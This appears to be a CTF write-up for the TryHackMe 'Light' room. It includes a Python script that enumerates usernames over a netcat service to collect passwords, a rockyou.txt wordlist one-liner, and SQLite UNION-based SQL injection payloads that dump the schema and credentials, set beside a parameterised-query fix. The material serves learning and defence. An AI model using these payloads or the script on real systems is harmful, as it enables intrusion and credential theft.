THM Light room notes
Room:
CTF intro:
“I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using:

```shell
nc MACHINE_IP 1337
```

You can use the username smokey in order to get started.”
Notes
- With all this info I started as suggested - by providing username, in response you will get a password
- First idea actually was not SQL injection, but just a bruteforce, so I wrote a short python script to poke the service:
```python
import socket
import argparse
import time
import re


def brute_force(ip, port, userlist):
    try:
        with open(userlist, "r") as f:
            for user in f:
                user = user.strip()
                if not user:
                    continue  # skip blank lines in the wordlist
                print(f"[*] Trying username: {user}")
                try:
                    # Context manager closes the socket even when recv/connect raises
                    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                        s.settimeout(5)  # don't hang forever if the service stays silent
                        s.connect((ip, port))
                        s.recv(1024)  # Consume the initial "Please enter your username" prompt
                        time.sleep(0.5)  # small pause, in case the service is slow
                        # The service reads a line, so terminate the username with a newline
                        s.sendall((user + "\n").encode())
                        time.sleep(0.5)
                        response = s.recv(1024).decode(errors="replace")
                        # Extract the password the service echoes back, e.g. "Password: abc123"
                        match = re.search(r"Password:\s*(\S+)", response)
                        if match:
                            password = match.group(1)
                            print(f"[+] Found password for {user}: {password}")
                except Exception as e:
                    print(f"[-] Error: {e}")
    except FileNotFoundError:
        print("[!] Username file not found.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Brute-force username enumeration over a netcat-like service."
    )
    parser.add_argument("ip", help="Target IP address")
    parser.add_argument("port", type=int, help="Target port number")
    parser.add_argument("userlist", help="Path to the username list file")
    args = parser.parse_args()
    brute_force(args.ip, args.port, args.userlist)
```
- Preparing the wordlist: I figured the username must be 14 characters long, so I decided to build a new list from rockyou.txt (since it is an easy room, that should be enough). A quick one-liner for that:

```shell
grep -o '\b\w\{14\}\b' rockyou.txt > 14_symbols_words.txt
```
- While the brute force was running I realized that, since it is a database, we could try SQL injection in the meantime.
- After some time trying different payloads I found that UNION works in this case (pay attention to letter case) and that the backend is a SQLite database:

```sql
' Union 1 '
' Union Select group_concat(sql) From sqlite_master '
' Union Select group_concat(username || '~' || password) From <here will be some table from previous query> '
```
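Why the mixed-case UNION gets through and what actually fixes it, as an added example (not the room's code and not my script above): a constructed in-memory SQLite stand-in whose query is built by string concatenation behind a lowercase-only keyword denylist, beside a parameterised version of the same lookup. The table name, the row values and the denylist are assumptions; only the payloads come from the notes above.

```python
import sqlite3

# Constructed stand-in for the room's "Light" database; the real schema is not in
# the notes, so the table and the row values here are made up for the demonstration.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usertable (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO usertable VALUES (?, ?)",
                     [("smokey", "constructed-pass-1"), ("alice", "constructed-pass-2")])
    conn.commit()
    return conn

# Naive denylist that only matches lowercase keywords (assumption: this is what
# "pay attention to letter case" in the notes suggests the app does).
BLOCKED = ("union", "select")

def lookup_vulnerable(conn, username):
    """Builds the query by string concatenation. The denylist is case-sensitive,
    so 'Union' / 'Select' pass it and a second SELECT is glued onto the query;
    the trailing quote in the payload becomes an (empty) table alias in SQLite."""
    if any(word in username for word in BLOCKED):
        return "Blocked"
    query = f"SELECT password FROM usertable WHERE username = '{username}'"
    try:
        return [row[0] for row in conn.execute(query).fetchall()]
    except sqlite3.Error as exc:
        # Echoing the engine's error text is what tells a tester the backend is SQLite
        return f"Error: {exc}"

def lookup_safe(conn, username):
    """Parameterised query: the input is bound as data, so quotes and keywords in it
    are never parsed as SQL and no denylist is needed at all."""
    rows = conn.execute("SELECT password FROM usertable WHERE username = ?",
                        (username,)).fetchall()
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = build_db()
    for payload in ("smokey",
                    "' union select 1 '",
                    "' Union Select group_concat(sql) From sqlite_master '"):
        print(f"vulnerable({payload!r}) -> {lookup_vulnerable(db, payload)}")
        print(f"safe({payload!r}) -> {lookup_safe(db, payload)}")
```

The lowercase payload is caught by the denylist, the mixed-case one returns the schema from sqlite_master, and the parameterised lookup returns nothing for either because the whole string is treated as a username.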
- Actually, that’s it for this room. The Python script was kind of a waste of time from this room’s point of view, but I like writing scripts anyway, so no regrets haha :D
This post is licensed under CC BY 4.0 by the author.
